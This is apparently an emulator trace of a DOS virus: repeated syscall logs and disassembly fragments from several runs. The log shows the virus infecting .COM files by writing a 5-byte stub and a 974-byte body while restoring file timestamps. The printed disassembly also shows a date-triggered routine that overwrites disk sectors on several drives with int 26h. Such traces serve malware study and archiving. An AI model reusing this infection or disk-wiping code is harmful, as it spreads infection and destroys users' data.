2018-12-25T12:43:41.832387881Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.834807489Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:41.838970392Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:41.841728743Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:41.843096334Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:41.286570286Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:41.290524114Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:41.29366014Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:41.299768252Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:41.311638897Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:41.322936696Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:41.329668969Z 62 PC: 12b20 | Close file
2018-12-25T12:43:41.332510261Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:41.347870382Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.357045582Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:41.360298538Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:41.362373588Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:41.365384838Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:41.374935788Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:41.37741523Z 62 PC: 12c29 | Close file
2018-12-25T12:43:41.398630134Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.408484271Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.412062655Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.418524265Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.424885432Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.427421519Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.437200858Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.444140949Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.448150979Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.44950235Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.452517126Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.462029453Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.463749607Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.480534982Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.494134292Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.503446671Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.509879611Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.517877412Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.520040455Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.529849323Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.537092441Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.539834837Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.541099278Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.543788106Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.552671699Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.554051105Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.57477447Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.585595157Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.588137808Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.594512008Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.601094644Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.603151222Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.613295969Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.620586619Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.623231097Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.624484774Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.628288245Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.636520388Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.637925016Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.647057236Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.65673704Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.659208539Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.666354046Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.672359062Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.674066087Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.678424571Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.683571091Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.689255645Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.690915106Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.694492283Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.711264564Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.712632658Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.7153577Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.72025777Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.722734506Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.730768046Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.736893392Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.738669372Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.757956969Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.764496393Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.767427894Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.769386814Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.772658841Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.784004801Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.786206661Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.794321759Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.804965883Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.808518372Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.815364063Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.821923118Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.824871523Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.835308016Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.842075855Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.845817525Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.847756781Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.851153117Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.860520843Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.862688766Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.870405415Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.880514908Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.883394784Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.889616397Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.895903149Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.898713792Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.901092006Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:41.905339926Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:41.908005362Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:41.909741268Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:41.364822422Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:41.36675213Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:41.371102426Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:41.378053209Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:41.384936719Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:41.393566174Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:41.400713387Z 62 PC: 12b20 | Close file
2018-12-25T12:43:41.40277601Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:41.424095052Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.431473922Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:41.438738463Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:41.441436894Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:41.444563417Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:41.454689809Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:41.456625364Z 62 PC: 12c29 | Close file
2018-12-25T12:43:41.465653456Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.476591088Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.479936257Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.489678891Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.496676284Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.498937176Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.5106108Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.518034404Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.521310162Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.523921958Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.527078274Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.537214944Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.539469674Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.548596483Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.560111553Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.56307264Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.571327249Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.57866352Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.581213195Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.593293355Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.602846337Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.606055758Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.608261666Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.611231078Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.621707079Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.624063074Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.633269007Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.644950525Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.648603138Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.656193547Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.663289889Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.665913069Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.677493856Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.685577356Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.689273401Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.691127933Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.694375304Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.704260746Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.706458258Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.715440347Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.727119207Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.731472684Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.739119134Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.746942369Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.750302216Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.755414192Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.763577649Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.767527536Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.769404818Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.772678365Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.796133539Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.798254403Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.800702047Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.806800255Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:41.811203385Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.81888388Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:41.826877978Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:41.829244908Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:41.84128124Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:41.851483578Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:41.855223447Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:41.856988258Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:41.860868506Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:41.872446929Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:41.875289999Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:41.884483608Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:42.125459507Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:42.128724938Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:42.136199501Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:42.144318013Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:42.14707539Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:42.28692086Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:42.291718074Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:42.294160515Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:42.295482952Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:42.297799241Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:42.304702982Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:42.306000608Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:42.311340896Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:42.318986762Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:42.321092963Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:42.325785795Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:42.330542946Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:42.332098711Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:42.333790716Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:42.337128215Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:42.338657254Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:42.339852363Z 26 PC: 12cc6 | Set disk transfer address (See above)